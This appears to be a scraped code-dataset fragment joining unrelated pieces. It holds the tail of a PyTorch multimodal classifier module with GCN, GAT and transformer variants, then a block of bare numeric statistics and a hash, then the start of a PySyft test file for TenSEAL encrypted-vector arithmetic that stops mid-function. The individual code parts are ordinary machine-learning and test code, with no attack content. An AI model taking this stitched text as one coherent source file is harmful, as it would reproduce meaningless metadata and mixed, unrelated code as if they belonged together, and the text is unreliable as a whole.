        self.Rs_GCN_5 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
        self.Rs_GCN_6 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
        self.Rs_GCN_7 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
        self.Rs_GCN_8 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
        # Attention model over the backbone feature map.
        self.attention = attention
        self.attn = AttentionModel()
        self.attn_bn = nn.BatchNorm2d(2048)
        # Global branch: flatten BS x 2048 x 7 x 7 = 100352 -> 2048.
        self.fc1_bn = nn.BatchNorm1d(2048 * 7 * 7)
        self.fc1 = nn.Linear(2048 * 7 * 7, 2048)
        # Local features N x max_visual x 2048 -> 1920.
        self.fc2_bn = nn.BatchNorm1d(self.args.max_visual)
        self.fc2 = nn.Linear(2048, 1920)
        # Textual features N x max_textual x emb -> 1024 -> 1920.
        self.bn_text1 = nn.BatchNorm1d(self.args.max_textual)
        self.fc_text1 = nn.Linear(self.embedding_size, 1024)
        self.bn_text2 = nn.BatchNorm1d(self.args.max_textual)
        self.fc_text2 = nn.Linear(1024, 1920)
        # Bbox positional encoding: 4 coords -> 128-d, per node.
        self.bn_encod_bboxes = nn.BatchNorm1d(self.args.max_visual + self.args.max_textual)
        self.fc_encod_bboxes = nn.Linear(4, 128)
        # Projection layer: collapses graph nodes to one 2048-d vector.
        if self.args.projection_layer == 'gru':
            self.gru_local = nn.GRU(2048, 2048, 1, batch_first=True)
        elif self.args.projection_layer == 'fc' or self.args.projection_layer == 'attention':
            self.bn_projection = nn.BatchNorm1d((self.args.max_textual + self.args.max_visual) * 2048)
            self.fc_projection = nn.Linear((self.args.max_textual + self.args.max_visual) * 2048, 2048)
        # Final fusion before classification.
        if self.args.fusion == 'block':
            self.fusion = Block([2048, 2048], 2048, mm_dim=self.args.mmdim)
            self.final_bn = nn.BatchNorm1d(2048)
            self.final_fc = nn.Linear(2048, num_classes)
        elif self.args.fusion == 'mlb':
            self.fusion = MLB([2048, 2048], 2048, mm_dim=self.args.mmdim)
            self.final_bn = nn.BatchNorm1d(2048)
            self.final_fc = nn.Linear(2048, num_classes)
        elif self.args.fusion == 'attention' or self.args.fusion == 'dot':
            # Attention or dot product keep the 2048-d shape.
            self.final_bn = nn.BatchNorm1d(2048)
            self.final_fc = nn.Linear(2048, num_classes)
        elif self.args.fusion == 'concat':
            # Concatenation doubles the feature size.
            self.final_bn = nn.BatchNorm1d(2048 * 2)
            self.final_fc = nn.Linear(2048 * 2, num_classes)
        else:
            print("Error: Last Layer Fusion selected not implemented")

    def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
        """Return (logits, attn_mask, affinity_matrix).

        attn_mask is None when attention is disabled; affinity_matrix comes
        from the last GCN layer.
        """
        # BUGFIX: attn_mask was unbound at return when self.attention is False.
        attn_mask = None
        x = self.cnn_features(im)  # Size (BS x 2048 x 7 x 7)
        if self.attention:
            x, attn_mask = self.attn(x)  # Size (BS x 2048)
            x = self.attn_bn(x)
        x = x.view(x.size(0), -1)
        x = F.leaky_relu(self.fc1(self.fc1_bn(x)))
        # Textual features: N x max_textual x emb -> 1024 -> 1920.
        textual_features = self.bn_text1(textual_features)
        textual_features = F.leaky_relu(self.fc_text1(textual_features))
        textual_features = self.bn_text2(textual_features)
        textual_features = F.leaky_relu(self.fc_text2(textual_features))
        # Local features -> 1920.
        GCN_img_emd = F.leaky_relu(self.fc2(self.fc2_bn(local_features)))
        # Encode visual + textual bounding boxes (4 -> 128 per node).
        bboxes_feats = torch.cat((local_bboxes, text_bboxes), dim=1)
        bboxes_feats = self.bn_encod_bboxes(bboxes_feats)
        bboxes_feats = F.leaky_relu(self.fc_encod_bboxes(bboxes_feats))
        # Stack local + textual nodes, then append each node's bbox encoding
        # along the feature dimension (1920 + 128 = 2048).
        GCN_img_emd = torch.cat((GCN_img_emd, textual_features), dim=1)
        GCN_img_emd = torch.cat((GCN_img_emd, bboxes_feats), dim=2)
        # GCN reasoning; each layer also returns an affinity matrix, only the
        # last one is kept.
        GCN_img_emd = GCN_img_emd.permute(0, 2, 1)  # -> B,D,N
        GCN_img_emd, __ = self.Rs_GCN_1(GCN_img_emd)
        GCN_img_emd, __ = self.Rs_GCN_2(GCN_img_emd)
        GCN_img_emd, __ = self.Rs_GCN_3(GCN_img_emd)
        GCN_img_emd, __ = self.Rs_GCN_4(GCN_img_emd)
        GCN_img_emd, __ = self.Rs_GCN_5(GCN_img_emd)
        GCN_img_emd, __ = self.Rs_GCN_6(GCN_img_emd)
        GCN_img_emd, __ = self.Rs_GCN_7(GCN_img_emd)
        GCN_img_emd, affinity_matrix = self.Rs_GCN_8(GCN_img_emd)
        GCN_img_emd = GCN_img_emd.permute(0, 2, 1)  # -> B,N,D
        GCN_img_emd = l2norm(GCN_img_emd)
        # Collapse graph nodes to a single 2048-d vector.
        if self.args.projection_layer == 'gru':
            rnn_img, hidden_state = self.gru_local(GCN_img_emd)
            GCN_img_emd = hidden_state[0]  # final hidden state of the single layer
        elif self.args.projection_layer == 'fc':
            GCN_img_emd = torch.reshape(GCN_img_emd, (sample_size, -1))
            GCN_img_emd = F.leaky_relu(self.fc_projection(self.bn_projection(GCN_img_emd)))
        elif self.args.projection_layer == 'attention':
            # Attention of the global feature over graph nodes: (B,1,nodes).
            visual_atnn = torch.bmm(x.reshape(sample_size, 1, 2048), GCN_img_emd.permute(0, 2, 1))
            visual_atnn = F.leaky_relu(visual_atnn)
            visual_atnn = F.softmax(visual_atnn, dim=2)
            GCN_img_emd = torch.bmm(visual_atnn, GCN_img_emd).reshape(sample_size, -1)
        elif self.args.projection_layer == 'mean':
            GCN_img_emd = torch.mean(GCN_img_emd, dim=1)
        else:
            print("Forward pass Error in Projection Layer")
        # Fuse with the global feature.
        if self.args.fusion == 'attention':
            visual_atnn = x * GCN_img_emd  # elem-wise mult - Shape: N x 2048
            visual_atnn = torch.tanh(visual_atnn)
            visual_atnn = F.softmax(visual_atnn, dim=1)
            x = visual_atnn * GCN_img_emd
        elif self.args.fusion == 'mlb' or self.args.fusion == 'block':
            x = self.fusion([GCN_img_emd.view(sample_size, -1), x])
        elif self.args.fusion == 'dot':
            x = x * GCN_img_emd  # elem-wise mult - Shape: N x 2048
        elif self.args.fusion == 'concat':
            x = torch.cat((x, GCN_img_emd), dim=1)
        else:
            print('Error on forward pass fusion')
        x = F.dropout(self.final_fc(self.final_bn(x)), p=0.3, training=self.training)
        return x, attn_mask, affinity_matrix
class GAT_bboxes(nn.Module):
    """Graph-attention (GAT) variant of the bbox-aware classifier.

    Same feature pipeline as fullGCN_bboxes (global ResNet-152 + local
    Faster R-CNN + textual embeddings, nodes = 1920-d features + 128-d bbox
    encoding), but the graph reasoning uses five GATLayer modules with a
    dense adjacency instead of the Rs_GCN stack.
    """

    def __init__(self, args, num_classes, embedding_size, pretrained=True, attention=True):
        super(GAT_bboxes, self).__init__()
        self.args = args
        self.embedding_size = embedding_size
        self.num_classes = num_classes
        self.pretrained = pretrained
        # ResNet-152 backbone: only layer4 is fine-tuned, the rest is frozen.
        resnet152 = models.resnet152(pretrained)
        for name, child in resnet152.named_children():
            if name not in ['layer4']:
                for param in child.parameters():
                    param.requires_grad = False
            else:
                for param in child.parameters():
                    param.requires_grad = True
        self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
        # GAT reasoning (node dim = 1920 features + 128 bbox encoding).
        gat_dim_size = 2048
        self.layer_1 = GATLayer(in_features=gat_dim_size, out_features=gat_dim_size)
        self.layer_2 = GATLayer(in_features=gat_dim_size, out_features=gat_dim_size)
        self.layer_3 = GATLayer(in_features=gat_dim_size, out_features=gat_dim_size)
        self.layer_4 = GATLayer(in_features=gat_dim_size, out_features=gat_dim_size)
        self.layer_5 = GATLayer(in_features=gat_dim_size, out_features=gat_dim_size, concat=False)
        # Attention model over the backbone feature map.
        self.attention = attention
        self.attn = AttentionModel()
        self.attn_bn = nn.BatchNorm2d(2048)
        # Global branch: flatten BS x 2048 x 7 x 7 = 100352 -> 2048.
        self.fc1_bn = nn.BatchNorm1d(2048 * 7 * 7)
        self.fc1 = nn.Linear(2048 * 7 * 7, 2048)
        # Local features N x max_visual x 2048 -> 1920.
        self.fc2_bn = nn.BatchNorm1d(self.args.max_visual)
        self.fc2 = nn.Linear(2048, 1920)
        # Textual features N x max_textual x emb -> 1024 -> 1920.
        self.bn_text1 = nn.BatchNorm1d(self.args.max_textual)
        self.fc_text1 = nn.Linear(self.embedding_size, 1024)
        self.bn_text2 = nn.BatchNorm1d(self.args.max_textual)
        self.fc_text2 = nn.Linear(1024, 1920)
        # Bbox positional encoding: 4 coords -> 128-d, per node.
        self.bn_encod_bboxes = nn.BatchNorm1d(self.args.max_visual + self.args.max_textual)
        self.fc_encod_bboxes = nn.Linear(4, 128)
        # Projection layer: collapses graph nodes to one 2048-d vector.
        if self.args.projection_layer == 'gru':
            self.gru_local = nn.GRU(2048, 2048, 1, batch_first=True)
        elif self.args.projection_layer == 'fc' or self.args.projection_layer == 'attention':
            self.bn_projection = nn.BatchNorm1d((self.args.max_textual + self.args.max_visual) * 2048)
            self.fc_projection = nn.Linear((self.args.max_textual + self.args.max_visual) * 2048, 2048)
        # Final fusion before classification.
        if self.args.fusion == 'block':
            self.fusion = Block([2048, 2048], 2048, mm_dim=self.args.mmdim)
            self.final_bn = nn.BatchNorm1d(2048)
            self.final_fc = nn.Linear(2048, num_classes)
        elif self.args.fusion == 'mlb':
            self.fusion = MLB([2048, 2048], 2048, mm_dim=self.args.mmdim)
            self.final_bn = nn.BatchNorm1d(2048)
            self.final_fc = nn.Linear(2048, num_classes)
        elif self.args.fusion == 'attention' or self.args.fusion == 'dot':
            # Attention or dot product keep the 2048-d shape.
            self.final_bn = nn.BatchNorm1d(2048)
            self.final_fc = nn.Linear(2048, num_classes)
        elif self.args.fusion == 'concat':
            # Concatenation doubles the feature size.
            self.final_bn = nn.BatchNorm1d(2048 * 2)
            self.final_fc = nn.Linear(2048 * 2, num_classes)
        else:
            print("Error: Last Layer Fusion selected not implemented")

    def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
        """Return (logits, attn_mask, mock_affinity_matrix).

        attn_mask is None when attention is disabled. GAT layers do not
        expose an affinity matrix, so a zero tensor is returned to keep the
        interface of the GCN variants.
        """
        # BUGFIX: attn_mask was unbound at return when self.attention is False.
        attn_mask = None
        x = self.cnn_features(im)  # Size (BS x 2048 x 7 x 7)
        if self.attention:
            x, attn_mask = self.attn(x)  # Size (BS x 2048)
            x = self.attn_bn(x)
        x = x.view(x.size(0), -1)
        x = F.leaky_relu(self.fc1(self.fc1_bn(x)))
        # Textual features: N x max_textual x emb -> 1024 -> 1920.
        textual_features = self.bn_text1(textual_features)
        textual_features = F.leaky_relu(self.fc_text1(textual_features))
        textual_features = self.bn_text2(textual_features)
        textual_features = F.leaky_relu(self.fc_text2(textual_features))
        # Local features -> 1920.
        GCN_img_emd = F.leaky_relu(self.fc2(self.fc2_bn(local_features)))
        # Encode visual + textual bounding boxes (4 -> 128 per node).
        bboxes_feats = torch.cat((local_bboxes, text_bboxes), dim=1)
        bboxes_feats = self.bn_encod_bboxes(bboxes_feats)
        bboxes_feats = F.leaky_relu(self.fc_encod_bboxes(bboxes_feats))
        # Stack local + textual nodes, then append each node's bbox encoding
        # along the feature dimension (1920 + 128 = 2048).
        GCN_img_emd = torch.cat((GCN_img_emd, textual_features), dim=1)
        GCN_img_emd = torch.cat((GCN_img_emd, bboxes_feats), dim=2)
        GCN_img_emd = GCN_img_emd.permute(0, 2, 1)  # -> B,D,N
        # BUGFIX: removed a leftover `import pdb; pdb.set_trace()` hard
        # breakpoint that froze every forward pass.
        # Dense adjacency over all nodes. Node count was hard-coded to 51;
        # it is now derived from the tensor (= max_visual + max_textual) and
        # built on the feature device to avoid a CPU/GPU mismatch.
        # NOTE(review): adj is 1-D all-ones — confirm GATLayer's expected
        # adjacency shape.
        nodes = GCN_img_emd.size(2)
        adj = torch.ones(nodes, device=GCN_img_emd.device)
        GCN_img_emd = self.layer_1(GCN_img_emd, adj)
        GCN_img_emd = self.layer_2(GCN_img_emd, adj)
        GCN_img_emd = self.layer_3(GCN_img_emd, adj)
        GCN_img_emd = self.layer_4(GCN_img_emd, adj)
        GCN_img_emd = self.layer_5(GCN_img_emd, adj)
        GCN_img_emd = GCN_img_emd.permute(0, 2, 1)  # -> B,N,D
        GCN_img_emd = l2norm(GCN_img_emd)
        # Collapse graph nodes to a single 2048-d vector.
        if self.args.projection_layer == 'gru':
            rnn_img, hidden_state = self.gru_local(GCN_img_emd)
            GCN_img_emd = hidden_state[0]  # final hidden state of the single layer
        elif self.args.projection_layer == 'fc':
            GCN_img_emd = torch.reshape(GCN_img_emd, (sample_size, -1))
            GCN_img_emd = F.leaky_relu(self.fc_projection(self.bn_projection(GCN_img_emd)))
        elif self.args.projection_layer == 'attention':
            # Attention of the global feature over graph nodes: (B,1,nodes).
            visual_atnn = torch.bmm(x.reshape(sample_size, 1, 2048), GCN_img_emd.permute(0, 2, 1))
            visual_atnn = F.leaky_relu(visual_atnn)
            visual_atnn = F.softmax(visual_atnn, dim=2)
            GCN_img_emd = torch.bmm(visual_atnn, GCN_img_emd).reshape(sample_size, -1)
        elif self.args.projection_layer == 'mean':
            GCN_img_emd = torch.mean(GCN_img_emd, dim=1)
        else:
            print("Forward pass Error in Projection Layer")
        # Fuse with the global feature.
        if self.args.fusion == 'attention':
            visual_atnn = x * GCN_img_emd  # elem-wise mult - Shape: N x 2048
            visual_atnn = torch.tanh(visual_atnn)
            visual_atnn = F.softmax(visual_atnn, dim=1)
            x = visual_atnn * GCN_img_emd
        elif self.args.fusion == 'mlb' or self.args.fusion == 'block':
            x = self.fusion([GCN_img_emd.view(sample_size, -1), x])
        elif self.args.fusion == 'dot':
            x = x * GCN_img_emd  # elem-wise mult - Shape: N x 2048
        elif self.args.fusion == 'concat':
            x = torch.cat((x, GCN_img_emd), dim=1)
        else:
            print('Error on forward pass fusion')
        x = F.dropout(self.final_fc(self.final_bn(x)), p=0.3, training=self.training)
        # NOTE(review): hard-coded .cuda() breaks CPU-only runs — consider
        # deriving the device from an input tensor.
        mock_affinity_matrix = np.zeros(1)
        mock_affinity_matrix = torch.from_numpy(mock_affinity_matrix).cuda()
        return x, attn_mask, mock_affinity_matrix
class transformer_net(nn.Module):
    """Transformer-encoder variant of the multimodal classifier.

    Global (ResNet-152) features are fused by concatenation with the mean of
    transformer-encoded local (Faster R-CNN) + textual nodes; each node is
    1920-d projected features plus a 128-d bbox encoding (= 2048-d).
    """

    def __init__(self, args, num_classes, embedding_size, pretrained=True, attention=True):
        super(transformer_net, self).__init__()
        self.args = args
        self.embedding_size = embedding_size
        self.num_classes = num_classes
        self.pretrained = pretrained
        # ResNet-152 backbone: only layer4 is fine-tuned, the rest is frozen.
        resnet152 = models.resnet152(pretrained)
        for name, child in resnet152.named_children():
            if name not in ['layer4']:
                for param in child.parameters():
                    param.requires_grad = False
            else:
                for param in child.parameters():
                    param.requires_grad = True
        self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
        # Attention model over the backbone feature map.
        self.attention = attention
        self.attn = AttentionModel()
        self.attn_bn = nn.BatchNorm2d(2048)
        # Global branch: flatten BS x 2048 x 7 x 7 = 100352 -> 2048.
        self.fc1_bn = nn.BatchNorm1d(2048 * 7 * 7)
        self.fc1 = nn.Linear(2048 * 7 * 7, 2048)
        # Local features N x max_visual x 2048 -> 1920.
        self.fc2_bn = nn.BatchNorm1d(self.args.max_visual)
        self.fc2 = nn.Linear(2048, 1920)
        # Textual features N x max_textual x emb -> 1024 -> 1920.
        self.bn_text1 = nn.BatchNorm1d(self.args.max_textual)
        self.fc_text1 = nn.Linear(self.embedding_size, 1024)
        self.bn_text2 = nn.BatchNorm1d(self.args.max_textual)
        self.fc_text2 = nn.Linear(1024, 1920)
        # Bbox positional encoding: 4 coords -> 128-d, per node.
        self.bn_encod_bboxes = nn.BatchNorm1d(self.args.max_visual + self.args.max_textual)
        self.fc_encod_bboxes = nn.Linear(4, 128)
        # Transformer encoder over the 2048-d nodes.
        # NOTE(review): TransformerEncoderLayer is built without
        # batch_first, so it treats dim 0 as the sequence; the forward pass
        # feeds (batch, nodes, dim) — confirm this is intended.
        hidden_dim = 2048
        nheads = 8
        num_encoder_layers = 6
        encoder_layer = nn.TransformerEncoderLayer(hidden_dim, nheads)
        self.transformer = nn.TransformerEncoder(
            encoder_layer,
            num_encoder_layers,
            norm=nn.LayerNorm(normalized_shape=hidden_dim, eps=1e-6),
        )
        # FC on the pooled transformer output.
        self.bn_out_transformer = nn.BatchNorm1d(2048)
        self.fc_out_transformer = nn.Linear(2048, 2048)
        # Final classification (only concat fusion is implemented).
        if self.args.fusion == 'concat':
            self.final_bn = nn.BatchNorm1d(2048 * 2)
            self.final_fc = nn.Linear(2048 * 2, num_classes)
        else:
            print("Error: Last Layer Fusion selected not implemented")

    def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
        """Return (logits, attn_mask, mock_affinity_matrix).

        attn_mask is None when attention is disabled; the affinity matrix is
        a zero placeholder kept for interface parity with the GCN variants.
        """
        # BUGFIX: attn_mask was unbound at return when self.attention is False.
        attn_mask = None
        x = self.cnn_features(im)  # Size (BS x 2048 x 7 x 7)
        if self.attention:
            x, attn_mask = self.attn(x)  # Size (BS x 2048)
            x = self.attn_bn(x)
        x = x.view(x.size(0), -1)
        x = F.leaky_relu(self.fc1(self.fc1_bn(x)))
        # Textual features: N x max_textual x emb -> 1024 -> 1920.
        textual_features = self.bn_text1(textual_features)
        textual_features = F.leaky_relu(self.fc_text1(textual_features))
        textual_features = self.bn_text2(textual_features)
        textual_features = F.leaky_relu(self.fc_text2(textual_features))
        # Local features -> 1920.
        local_features = F.leaky_relu(self.fc2(self.fc2_bn(local_features)))
        # Encode visual + textual bounding boxes (4 -> 128 per node).
        bboxes_feats = torch.cat((local_bboxes, text_bboxes), dim=1)
        bboxes_feats = self.bn_encod_bboxes(bboxes_feats)
        bboxes_feats = F.leaky_relu(self.fc_encod_bboxes(bboxes_feats))
        # Stack local + textual nodes, then append each node's bbox encoding
        # along the feature dimension (1920 + 128 = 2048).
        local_features = torch.cat((local_features, textual_features), dim=1)
        local_features = torch.cat((local_features, bboxes_feats), dim=2)
        # Transformer reasoning over the node set, mean-pooled to one vector.
        local_features = self.transformer(local_features)
        local_features = torch.mean(local_features, dim=1)
        local_features = self.bn_out_transformer(local_features)
        local_features = F.leaky_relu(self.fc_out_transformer(local_features))
        local_features = l2norm(local_features)
        # Fuse (L2-normalized) global and node features and classify.
        x = torch.cat((l2norm(x), local_features), dim=1)
        x = F.dropout(self.final_fc(self.final_bn(x)), p=0.3, training=self.training)
        # NOTE(review): hard-coded .cuda() breaks CPU-only runs — consider
        # deriving the device from an input tensor.
        mock_affinity_matrix = np.zeros(1)
        mock_affinity_matrix = torch.from_numpy(mock_affinity_matrix).cuda()
        return x, attn_mask, mock_affinity_matrix
| 41.822626
| 141
| 0.630957
| 10,343
| 73,566
| 4.256309
| 0.032582
| 0.031075
| 0.046612
| 0.0169
| 0.915635
| 0.905072
| 0.895464
| 0.890148
| 0.881925
| 0.872158
| 0
| 0.053084
| 0.263287
| 73,566
| 1,758
| 142
| 41.846416
| 0.759193
| 0.168475
| 0
| 0.78785
| 0
| 0
| 0.018171
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03271
| false
| 0.005607
| 0.013084
| 0.000935
| 0.091589
| 0.011215
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86ca6ae5dc79204d8e9b7107f2737e917d834899
| 9,928
|
py
|
Python
|
packages/syft/tests/syft/lib/tenseal/tenseal_ckksvector_test.py
|
exityan/PySyft
|
35166c487a5be57f9ad28929ed88a8ba6bdd5aeb
|
[
"Apache-2.0"
] | 1
|
2020-08-01T08:23:54.000Z
|
2020-08-01T08:23:54.000Z
|
packages/syft/tests/syft/lib/tenseal/tenseal_ckksvector_test.py
|
exityan/PySyft
|
35166c487a5be57f9ad28929ed88a8ba6bdd5aeb
|
[
"Apache-2.0"
] | 5
|
2020-09-11T05:47:12.000Z
|
2020-10-13T08:36:17.000Z
|
packages/syft/tests/syft/lib/tenseal/tenseal_ckksvector_test.py
|
exityan/PySyft
|
35166c487a5be57f9ad28929ed88a8ba6bdd5aeb
|
[
"Apache-2.0"
] | 1
|
2020-10-15T06:13:38.000Z
|
2020-10-15T06:13:38.000Z
|
# stdlib
from typing import Any
from typing import Sequence
# third party
import pytest
# syft absolute
import syft as sy
# syft relative
from .utils_test import decrypt
# Skip this entire module when the optional TenSEAL dependency is absent.
ts = pytest.importorskip("tenseal")
def _almost_equal(vec1: Sequence, vec2: Sequence, precision_pow_ten: int = 1) -> None:
upper_bound = pow(10, -precision_pow_ten)
assert pytest.approx(vec1, abs=upper_bound) == vec2
@pytest.fixture(scope="function")
def context() -> Any:
    """Build a fresh CKKS TenSEAL context (with galois keys) for each test."""
    ckks_ctx = ts.context(
        ts.SCHEME_TYPE.CKKS, 8192, coeff_mod_bit_sizes=[60, 40, 40, 60], n_threads=1
    )
    ckks_ctx.global_scale = 2 ** 40
    ckks_ctx.generate_galois_keys()
    return ckks_ctx
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_sanity(
    context: Any, root_client: sy.VirtualMachineClient
) -> None:
    """Round-trip sanity check: encrypt, send, link, decrypt unchanged."""
    values = [0, 1, 2, 3, 4]
    ctx_ptr = context.send(root_client, pointable=True)
    vec_ptr = ts.ckks_vector(context, values).send(root_client, pointable=True)
    vec_ptr.link_context(ctx_ptr)
    _almost_equal(decrypt(context, vec_ptr), [0, 1, 2, 3, 4])
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_add(
    context: Any, root_client: sy.VirtualMachineClient
) -> None:
    """Encrypted + encrypted addition, both operator and in-place forms."""
    left = [0, 1, 2, 3, 4]
    right = [4, 3, 2, 1, 0]
    expected = [a + b for a, b in zip(left, right)]
    ctx_ptr = context.send(root_client, pointable=True)
    left_ptr = ts.ckks_vector(context, left).send(root_client, pointable=True)
    right_ptr = ts.ckks_vector(context, right).send(root_client, pointable=True)
    left_ptr.link_context(ctx_ptr)
    right_ptr.link_context(ctx_ptr)
    # operator form
    sum_ptr = left_ptr + right_ptr
    _almost_equal(decrypt(context, sum_ptr), expected)
    # in-place form mutates the left operand
    left_ptr += right_ptr
    _almost_equal(decrypt(context, left_ptr), expected)
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_sub(
    context: Any, root_client: sy.VirtualMachineClient
) -> None:
    """Encrypted - encrypted subtraction, both operator and in-place forms."""
    left = [0, 1, 2, 3, 4]
    right = [4, 3, 2, 1, 0]
    expected = [a - b for a, b in zip(left, right)]
    ctx_ptr = context.send(root_client, pointable=True)
    left_ptr = ts.ckks_vector(context, left).send(root_client, pointable=True)
    right_ptr = ts.ckks_vector(context, right).send(root_client, pointable=True)
    left_ptr.link_context(ctx_ptr)
    right_ptr.link_context(ctx_ptr)
    # operator form
    diff_ptr = left_ptr - right_ptr
    _almost_equal(decrypt(context, diff_ptr), expected)
    # in-place form mutates the left operand
    left_ptr -= right_ptr
    _almost_equal(decrypt(context, left_ptr), expected)
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_mul(
    context: Any, root_client: sy.VirtualMachineClient
) -> None:
    """Encrypted * encrypted multiplication, both operator and in-place forms."""
    left = [0, 1, 2, 3, 4]
    right = [4, 3, 2, 1, 0]
    expected = [a * b for a, b in zip(left, right)]
    ctx_ptr = context.send(root_client, pointable=True)
    left_ptr = ts.ckks_vector(context, left).send(root_client, pointable=True)
    right_ptr = ts.ckks_vector(context, right).send(root_client, pointable=True)
    left_ptr.link_context(ctx_ptr)
    right_ptr.link_context(ctx_ptr)
    # operator form
    prod_ptr = left_ptr * right_ptr
    _almost_equal(decrypt(context, prod_ptr), expected)
    # in-place form mutates the left operand
    left_ptr *= right_ptr
    _almost_equal(decrypt(context, left_ptr), expected)
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_iadd(
    context: Any, root_client: sy.VirtualMachineClient
) -> None:
    """Encrypted + plain list: operator, reflected, and in-place forms."""
    values = [0, 1, 2, 3, 4]
    plain = [4, 3, 2, 1, 0]
    expected = [a + b for a, b in zip(values, plain)]
    ctx_ptr = context.send(root_client, pointable=True)
    vec_ptr = ts.ckks_vector(context, values).send(root_client, pointable=True)
    vec_ptr.link_context(ctx_ptr)
    # plain operand on the right
    _almost_equal(decrypt(context, vec_ptr + plain), expected)
    # plain operand on the left (reflected add)
    _almost_equal(decrypt(context, plain + vec_ptr), expected)
    # in-place form mutates the pointer
    vec_ptr += plain
    _almost_equal(decrypt(context, vec_ptr), expected)
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_isub(
    context: Any, root_client: sy.VirtualMachineClient
) -> None:
    """Encrypted - plain list: operator and reflected forms."""
    values = [0, 1, 2, 3, 4]
    plain = [4, 3, 2, 1, 0]
    expected = [a - b for a, b in zip(values, plain)]
    ctx_ptr = context.send(root_client, pointable=True)
    vec_ptr = ts.ckks_vector(context, values).send(root_client, pointable=True)
    vec_ptr.link_context(ctx_ptr)
    # plain operand on the right
    _almost_equal(decrypt(context, vec_ptr - plain), expected)
    # reflected subtraction yields the negated differences
    _almost_equal(
        decrypt(context, plain - vec_ptr), [b - a for a, b in zip(values, plain)]
    )
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_imul(
    context: Any, root_client: sy.VirtualMachineClient
) -> None:
    """Encrypted * plain list: operator and reflected (rmul) forms.

    Bug fix: this function was previously named ``ptest_tenseal_ckksvector_imul``,
    so pytest never collected it and the imul/rmul path was silently untested.
    Renamed with the standard ``test_`` prefix so it actually runs.
    """
    v1 = [0, 1, 2, 3, 4]
    v2 = [4, 3, 2, 1, 0]
    # Element-wise product (avoid shadowing v1/v2 inside the comprehension).
    expected = [a * b for a, b in zip(v1, v2)]
    enc_v1 = ts.ckks_vector(context, v1)
    ctx_ptr = context.send(root_client, pointable=True)
    enc_v1_ptr = enc_v1.send(root_client, pointable=True)
    enc_v1_ptr.link_context(ctx_ptr)
    # imul: plain operand on the right
    result_enc_ptr = enc_v1_ptr * v2
    result = decrypt(context, result_enc_ptr)
    _almost_equal(result, expected)
    # rmul: plain operand on the left
    result_enc_ptr = v2 * enc_v1_ptr
    result = decrypt(context, result_enc_ptr)
    _almost_equal(result, expected)
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_power(
    context: Any, root_client: sy.VirtualMachineClient
) -> None:
    """Exponentiation of an encrypted vector via the ** operator."""
    ctx_ptr = context.send(root_client, pointable=True)
    vec_ptr = ts.ckks_vector(context, [0, 1, 2, 3, 4]).send(root_client, pointable=True)
    vec_ptr.link_context(ctx_ptr)
    cube_ptr = vec_ptr ** 3
    _almost_equal(decrypt(context, cube_ptr), [0, 1, 8, 27, 64])
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_negation(
    context: Any, root_client: sy.VirtualMachineClient
) -> None:
    """Unary negation of an encrypted vector."""
    ctx_ptr = context.send(root_client, pointable=True)
    vec_ptr = ts.ckks_vector(context, [1, 2, 3, 4, 5]).send(root_client, pointable=True)
    vec_ptr.link_context(ctx_ptr)
    negated_ptr = -vec_ptr
    _almost_equal(decrypt(context, negated_ptr), [-1, -2, -3, -4, -5])
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_square(
    context: Any, root_client: sy.VirtualMachineClient
) -> None:
    """Element-wise squaring via the square() method."""
    ctx_ptr = context.send(root_client, pointable=True)
    vec_ptr = ts.ckks_vector(context, [0, 1, 2, 3, 4]).send(root_client, pointable=True)
    vec_ptr.link_context(ctx_ptr)
    squared_ptr = vec_ptr.square()
    _almost_equal(decrypt(context, squared_ptr), [0, 1, 4, 9, 16])
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_sum(
    context: Any, root_client: sy.VirtualMachineClient
) -> None:
    """Reduction of an encrypted vector to its scalar sum."""
    ctx_ptr = context.send(root_client, pointable=True)
    vec_ptr = ts.ckks_vector(context, [0, 1, 2, 3, 4]).send(root_client, pointable=True)
    vec_ptr.link_context(ctx_ptr)
    total_ptr = vec_ptr.sum()
    _almost_equal(decrypt(context, total_ptr), [10])
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_polyval(
    context: Any, root_client: sy.VirtualMachineClient
) -> None:
    """Polynomial evaluation on encrypted inputs (coefficients low to high)."""
    coefficients = [1, 2, 3, 4]
    ctx_ptr = context.send(root_client, pointable=True)
    vec_ptr = ts.ckks_vector(context, [-2, 2]).send(root_client, pointable=True)
    vec_ptr.link_context(ctx_ptr)
    evaluated_ptr = vec_ptr.polyval(coefficients)
    # 1 + 2x + 3x^2 + 4x^3 at x = -2 and x = 2
    _almost_equal(decrypt(context, evaluated_ptr), [-23, 49])
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_dot(
    context: Any, root_client: sy.VirtualMachineClient
) -> None:
    """Dot product of two encrypted vectors, plain and in-place variants."""
    left = [0, 1, 2, 3, 4]
    right = [4, 3, 2, 1, 0]
    ctx_ptr = context.send(root_client, pointable=True)
    left_ptr = ts.ckks_vector(context, left).send(root_client, pointable=True)
